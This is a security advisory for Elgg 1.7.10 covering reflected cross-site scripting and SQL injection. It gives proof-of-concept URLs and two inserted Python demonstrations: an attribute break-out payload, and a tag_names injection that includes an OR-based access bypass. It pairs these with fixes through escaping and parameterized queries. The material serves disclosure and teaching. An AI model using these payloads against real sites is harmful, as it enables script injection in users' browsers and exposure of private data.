Elgg 1.7.10 Cross Site Scripting / SQL Injection

2011-08-18T00:00:00
ID PACKETSTORM:104159
Type packetstorm
Reporter Aung Khant
Modified 2011-08-18T00:00:00

Description

                                        
1. OVERVIEW
  
Elgg 1.7.10 and earlier are vulnerable to cross-site scripting and
SQL injection.
  
  
2. BACKGROUND  
  
Elgg is an award-winning social networking engine, delivering the  
building blocks that enable businesses, schools, universities and  
associations to create their own fully-featured social networks and  
applications. Well-known organizations with networks powered by Elgg
include: Australian Government, British Government, Federal Canadian  
Government, MITRE, The World Bank, UNESCO, NASA, Stanford University,  
Johns Hopkins University and more (http://elgg.org/powering.php)  
  
  
3. VULNERABILITY DESCRIPTION  
  
The "internalname" parameter of the /pg/embed/media page is not properly
sanitized before it is reflected into the page, which allows an attacker
to conduct a cross-site scripting attack: a specially crafted URL executes
arbitrary script code in the browser of any victim who opens it. The
"tag_names" parameter of the tag search (/pg/search/ with
search_type=tags) is not properly sanitized before it is used in a
database query, which allows an attacker to conduct a SQL injection
attack.
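The attribute break-out behind the internalname issue, as an added example that is not part of the advisory and not Elgg's code. The two templates are hypothetical stand-ins for whatever markup Elgg 1.7.10 built from the parameter (the advisory does not show the real sink); the PoC URL is copied from section 5; and Python's html.parser plays the role of the browser, reporting which attributes each rendering produces.

```python
"""Attribute-context reflection of the advisory's "internalname" payload.

Added illustration, not Elgg code: the templates below are a hypothetical
stand-in for whatever markup Elgg's /pg/embed/media page built from the
parameter. The PoC URL itself is copied from section 5 of the advisory.
"""
import html
from html.parser import HTMLParser
from urllib.parse import unquote, urlparse

# PoC URL from the advisory (section 5).
POC_URL = (
    "http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22"
    "style=%22width:3000px!important;height:3000px!important;z-index:999999;"
    "position:absolute!important;left:0;top:0;%22%20x=%22"
)


def internalname_from(url):
    """Return the decoded internalname value.

    Split by hand rather than with parse_qs: older parse_qs versions also
    split on ';', which would chop the style= part of this payload.
    """
    query = urlparse(url).query
    raw = query.split("internalname=", 1)[1].split("&", 1)[0]
    return unquote(raw)


def render_unescaped(internalname):
    """Hypothetical vulnerable template: the value lands inside a quoted
    attribute with no HTML escaping, so an embedded '"' ends the attribute."""
    return '<input type="file" name="%s" />' % internalname


def render_escaped(internalname):
    """Hardened form: html.escape(quote=True) turns '"' into &quot;, which
    cannot terminate the attribute (PHP: htmlspecialchars($v, ENT_QUOTES))."""
    return '<input type="file" name="%s" />' % html.escape(internalname, quote=True)


class _AttrCollector(HTMLParser):
    """Record the attributes a browser-side parser would see on the input tag."""

    def __init__(self):
        super().__init__()
        self.attrs = []

    def handle_starttag(self, tag, attrs):
        if tag == "input":
            self.attrs = attrs


def parsed_attributes(markup):
    """Parse rendered markup and return {attribute name: value} for the input tag."""
    parser = _AttrCollector()
    parser.feed(markup)
    parser.close()
    return dict(parser.attrs)


if __name__ == "__main__":
    value = internalname_from(POC_URL)
    print("decoded payload:", value)
    # The payload closes name="...", adds onmouseover= and a style= that
    # stretches the element over the whole viewport (so any pointer movement
    # fires the handler), then opens x=" to absorb the template's own
    # closing quote.
    print("unescaped :", sorted(parsed_attributes(render_unescaped(value))))
    print("escaped   :", sorted(parsed_attributes(render_escaped(value))))
```

The fix is escaping at the output sink for the context the value lands in: for a quoted attribute value that is htmlspecialchars() with ENT_QUOTES in PHP, and the attribute must actually be quoted, because no amount of escaping helps inside an unquoted attribute.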
  
  
4. VERSIONS AFFECTED  
  
Elgg 1.7.10 and earlier (<= 1.7.10)
  
  
5. PROOF-OF-CONCEPT/EXPLOIT  
  
- Cross Site Scripting

http://localhost/pg/embed/media?internalname=%20%22onmouseover=%22alert%28/XSS/%29%22style=%22width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;%22%20x=%22

URL-decoded, the internalname value is

 "onmouseover="alert(/XSS/)"style="width:3000px!important;height:3000px!important;z-index:999999;position:absolute!important;left:0;top:0;" x="

It breaks out of the HTML attribute the value is reflected into, adds an
onmouseover handler plus a style that stretches the element over the whole
viewport so the handler fires on any mouse movement, and opens a dummy x="
attribute to absorb the page's own closing quote.
  
- SQL Injection (information disclosure through the resulting database error)

http://localhost/pg/search/?q=SQLin&search_type=tags&tag_names=location%27

The unbalanced single quote in tag_names breaks the generated query; the
database error it provokes confirms the injection and discloses query
details.
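How a tag_names sink of this kind behaves, as an added example that is not part of the advisory and not Elgg's code: the schema, rows and query shape are constructed for illustration (the advisory does not show Elgg's real query), and SQLite stands in for Elgg's MySQL because it runs in-process. The example goes beyond the advisory's single-quote PoC to show that the same string splicing lets an attacker rewrite the WHERE clause and read a private record, and contrasts that with a parameterized query.

```python
"""Hypothetical tag search with the advisory's tag_names sink.

Added illustration, not Elgg code: schema, rows and the query shape are
constructed here; the real Elgg 1.7.10 query is not shown in the advisory.
SQLite stands in for MySQL because it runs in-process.
"""
import sqlite3


def make_db():
    """Constructed sample data: three profiles, one of them private, with tags."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE entities (guid INTEGER PRIMARY KEY, title TEXT, access TEXT);
        CREATE TABLE tags (entity_guid INTEGER, tag_name TEXT, tag_value TEXT);
        INSERT INTO entities VALUES
            (1, 'Alice profile', 'public'),
            (2, 'Bob profile',   'private'),
            (3, 'Carol profile', 'public');
        INSERT INTO tags VALUES
            (1, 'location',  'Yangon'),
            (1, 'interests', 'hacking'),
            (2, 'location',  'London'),
            (3, 'interests', 'SQLin');
        """
    )
    return conn


def search_vulnerable(conn, q, tag_names):
    """Vulnerable pattern: q and tag_names are spliced into the SQL text."""
    sql = (
        "SELECT DISTINCT e.guid, e.title FROM entities e "
        "JOIN tags t ON t.entity_guid = e.guid "
        f"WHERE e.access = 'public' AND t.tag_value LIKE '%{q}%' "
        f"AND t.tag_name = '{tag_names}' ORDER BY e.guid"
    )
    return conn.execute(sql).fetchall()


def search_parameterized(conn, q, tag_names):
    """Fix: bind both values; the driver never lets them become SQL syntax."""
    sql = (
        "SELECT DISTINCT e.guid, e.title FROM entities e "
        "JOIN tags t ON t.entity_guid = e.guid "
        "WHERE e.access = 'public' AND t.tag_value LIKE ? "
        "AND t.tag_name = ? ORDER BY e.guid"
    )
    return conn.execute(sql, ("%" + q + "%", tag_names)).fetchall()


def probe(conn, q, tag_names):
    """What an attacker observes from the vulnerable search: either result
    rows, or the database's error text (the information disclosure the
    advisory's tag_names=location' PoC relies on)."""
    try:
        return "rows", search_vulnerable(conn, q, tag_names)
    except sqlite3.Error as exc:
        return "error", str(exc)


if __name__ == "__main__":
    db = make_db()
    # Normal use: search_type=tags&tag_names=location&q=Yangon
    print(probe(db, "Yangon", "location"))
    # Advisory PoC: a lone quote unbalances the literal and the DB complains,
    # echoing part of the query back in the error message.
    print(probe(db, "SQLin", "location'"))
    # Same sink, rewritten WHERE clause: the OR swallows the access check and
    # the private profile leaks.
    print(probe(db, "London", "location' OR 'a'='a"))
    # The parameterized version treats the whole value as a tag name.
    print(search_parameterized(db, "London", "location' OR 'a'='a"))
```

The lesson is to bind values rather than strip or escape quotes by hand: with placeholders the attacker's input can only ever be compared as data, and a stray quote yields an empty result instead of a database error or a bypassed access check.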
  
  
6. SOLUTION  
  
Upgrade to 1.7.11 or higher.  
  
  
7. VENDOR  
  
Curverider Ltd  
http://www.curverider.co.uk/  
http://elgg.org/  
  
  
8. CREDIT  
  
This vulnerability was discovered by Aung Khant, http://yehg.net, YGN  
Ethical Hacker Group, Myanmar.  
  
  
9. DISCLOSURE TIME-LINE  
  
2011-08-01: vulnerability reported  
2011-08-15: vendor released fixed version  
2011-08-18: vulnerability disclosed  
  
  
10. REFERENCES  
  
Original Advisory URL:  
http://yehg.net/lab/pr0js/advisories/[elgg_1710]_xss_sqlin  
Project Home: http://elgg.org/  
Vendor Release Note:  
http://blog.elgg.org/pg/blog/brett/read/189/elgg-1711-released  
  
  
  
#yehg [2011-08-18]  